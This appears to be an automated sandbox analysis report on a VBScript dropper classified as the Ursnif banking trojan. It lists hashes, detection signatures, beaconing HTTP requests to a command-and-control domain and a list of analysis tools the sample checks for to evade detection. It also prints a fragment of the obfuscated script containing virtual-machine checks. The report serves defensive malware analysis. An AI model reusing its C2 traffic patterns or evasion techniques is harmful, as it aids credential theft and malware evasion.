Analysis Report YvGLRQ2lBoNg.vbs

Overview

General Information

Sample Name: YvGLRQ2lBoNg.vbs
Analysis ID: 284796
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Avira: detection malicious, Label: TR/Kryptik.fklcr
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\Temp\ogress.psd ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: YvGLRQ2lBoNg.vbs Virustotal: Detection: 21% Perma Link

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Source: global traffic HTTP traffic detected: GET /api1/d_2FkQMQPNS1PtreuLmDr0c/isKQ3en2ep/WdaePBnxWvNr4O7Zx/fe5GpcKXEs0Z/nWv1haJIdxX/KPQImnsWZc6Bts/3T1sv6KdCgBkk8kTcY4Tw/vLBIAR6SvcfKkftr/v3qWzzjdQvHhSwJ/vN5Dy_2FrTM09tl_2F/E9H6fSft8/LNlFBPxAbjE4J0c6TJOC/anV9v94dZW1QTs_2Fbn/bfOfyFPP6TfVwktOgPJiQQ/RMTYA97pNPcLL/nGwKPMp2/dEpg95nX_2B2Qt_0A_0DKLH/tTw8xa4uQv/h6OXh5Fmz3Z3zI7T2/MnlbUyKlzKYN/4KNu2_2B_2B/GIckXkWWxkB/utBojx5s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/1D7z5XkAX/_2FbQrtYcD1kFDfXonyT/Jj2mYzkdYtc4R7X6fxc/9urYr1WZcWa6ZWnQBAZ43f/xval831E1IBwG/n6pzC3ar/eKGANQIthekvo9zg_2Fb94x/iPFw6um9yA/exbRhIIlmYTmBTpxl/jJEsgsP3dBx9/zs5yDfHduFs/ySeUPKocHhrMVB/Q8EDMO_2B3zJSk5QBFGvT/Yy3iBRuEUbqp4Kxn/CqGIdwKcFdmihQj/fosd0P6SSgwFfVNavf/RyCG8rcLK/w_0A_0D7W0vvsSLrshwz/e9K8aNiOBT0pOorA5hH/f7RmqSwXFZJni1LXH4cpYp/tjerjQMglan/92z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: msapplication.xml.17.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.17.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.17.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.17.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.17.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.17.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.17.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.17.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
Java / VBScript file with very long strings (likely obfuscated code)
Source: YvGLRQ2lBoNg.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/17@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: YvGLRQ2lBoNg.vbs Virustotal: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: YvGLRQ2lBoNg.vbs Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: ogress.psd.1.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\yvglrq2lbong.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1420 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: ogress.psd.1.dr Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: ogress.psd.1.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY